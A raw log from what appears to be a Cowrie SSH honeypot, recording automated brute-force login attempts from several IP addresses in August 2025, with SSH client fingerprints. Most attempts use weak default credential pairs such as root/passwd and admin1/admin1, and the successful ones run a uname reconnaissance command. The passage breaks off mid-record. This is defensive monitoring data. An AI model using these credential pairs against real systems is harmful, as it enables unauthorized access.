{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:52.686363Z","src_ip":"212.227.125.160","session":"012720e22cd3"}
{"eventid":"cowrie.login.failed","username":"dton","password":"dton","message":"login attempt [dton/dton] failed","sensor":"my-vps","timestamp":"2025-08-26T11:19:52.843076Z","src_ip":"212.227.125.160","session":"012720e22cd3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:53.895768Z","src_ip":"212.227.125.160","session":"012720e22cd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36010,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ed574099c7e","protocol":"ssh","message":"New connection: 212.227.125.160:36010 (1.2.3.4:22) [session: 7ed574099c7e]","sensor":"my-vps","timestamp":"2025-08-26T11:19:58.147219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:19:58.148145Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:19:58.209329Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:19:59.097850Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:19:59.507915Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:19:59.508722Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:59.640152Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:19:59.641215Z","src_ip":"212.227.125.160","session":"7ed574099c7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36778,"dst_ip":"1.2.3.4","dst_port":22,"session":"2961b8607d7d","protocol":"ssh","message":"New connection: 212.227.125.160:36778 (1.2.3.4:22) [session: 2961b8607d7d]","sensor":"my-vps","timestamp":"2025-08-26T11:20:04.681065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:04.707280Z","src_ip":"212.227.125.160","session":"2961b8607d7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:04.765758Z","src_ip":"212.227.125.160","session":"2961b8607d7d"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"123456","message":"login attempt [testuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:05.757908Z","src_ip":"212.227.125.160","session":"2961b8607d7d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:06.889431Z","src_ip":"212.227.125.160","session":"2961b8607d7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37546,"dst_ip":"1.2.3.4","dst_port":22,"session":"7281a143399f","protocol":"ssh","message":"New connection: 212.227.125.160:37546 (1.2.3.4:22) [session: 7281a143399f]","sensor":"my-vps","timestamp":"2025-08-26T11:20:11.125581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:11.130026Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:11.392735Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:20:11.846004Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:20:11.981544Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:20:11.982289Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:12.033549Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:12.034748Z","src_ip":"212.227.125.160","session":"7281a143399f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38314,"dst_ip":"1.2.3.4","dst_port":22,"session":"810de7eaffad","protocol":"ssh","message":"New connection: 212.227.125.160:38314 (1.2.3.4:22) [session: 810de7eaffad]","sensor":"my-vps","timestamp":"2025-08-26T11:20:16.899073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:16.900235Z","src_ip":"212.227.125.160","session":"810de7eaffad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:16.996382Z","src_ip":"212.227.125.160","session":"810de7eaffad"}
{"eventid":"cowrie.login.failed","username":"user2","password":"user2","message":"login attempt [user2/user2] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:17.327107Z","src_ip":"212.227.125.160","session":"810de7eaffad"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:18.389883Z","src_ip":"212.227.125.160","session":"810de7eaffad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39086,"dst_ip":"1.2.3.4","dst_port":22,"session":"52630be71e52","protocol":"ssh","message":"New connection: 212.227.125.160:39086 (1.2.3.4:22) [session: 52630be71e52]","sensor":"my-vps","timestamp":"2025-08-26T11:20:23.075832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:23.085410Z","src_ip":"212.227.125.160","session":"52630be71e52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:23.158808Z","src_ip":"212.227.125.160","session":"52630be71e52"}
{"eventid":"cowrie.login.failed","username":"debian","password":"debian","message":"login attempt [debian/debian] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:23.487212Z","src_ip":"212.227.125.160","session":"52630be71e52"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:24.544642Z","src_ip":"212.227.125.160","session":"52630be71e52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39856,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bb23e7e9e2a","protocol":"ssh","message":"New connection: 212.227.125.160:39856 (1.2.3.4:22) [session: 6bb23e7e9e2a]","sensor":"my-vps","timestamp":"2025-08-26T11:20:29.712292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:29.713382Z","src_ip":"212.227.125.160","session":"6bb23e7e9e2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:29.763350Z","src_ip":"212.227.125.160","session":"6bb23e7e9e2a"}
{"eventid":"cowrie.login.failed","username":"mssql","password":"mssql","message":"login attempt [mssql/mssql] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:30.113740Z","src_ip":"212.227.125.160","session":"6bb23e7e9e2a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:20:31.181508Z","src_ip":"212.227.125.160","session":"6bb23e7e9e2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40622,"dst_ip":"1.2.3.4","dst_port":22,"session":"c71f3a07ee6b","protocol":"ssh","message":"New connection: 212.227.125.160:40622 (1.2.3.4:22) [session: c71f3a07ee6b]","sensor":"my-vps","timestamp":"2025-08-26T11:20:36.746304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:36.747337Z","src_ip":"212.227.125.160","session":"c71f3a07ee6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:20:36.815530Z","src_ip":"212.227.125.160","session":"c71f3a07ee6b"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin1","message":"login attempt [admin1/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:36.994072Z","src_ip":"212.227.125.160","session":"c71f3a07ee6b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":32840,"dst_ip":"1.2.3.4","dst_port":22,"session":"c80e532b990a","protocol":"ssh","message":"New connection: 196.251.86.249:32840 (1.2.3.4:22) [session: c80e532b990a]","sensor":"my-vps","timestamp":"2025-08-26T11:20:37.489063Z"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":43996,"dst_ip":"1.2.3.4","dst_port":22,"session":"5782f1522ffa","protocol":"ssh","message":"New connection: 93.123.109.189:43996 (1.2.3.4:22) [session: 5782f1522ffa]","sensor":"my-vps","timestamp":"2025-08-26T11:20:37.912984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:37.913843Z","src_ip":"93.123.109.189","session":"5782f1522ffa"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:20:37.932995Z","src_ip":"93.123.109.189","session":"5782f1522ffa"}
{"eventid":"cowrie.login.failed","username":"node","password":"1234","message":"login attempt [node/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:20:37.997516Z","src_ip":"93.123.109.189","session":"5782f1522ffa"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:20:38.027682Z","src_ip":"196.251.86.249","session":"c80e532b990a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-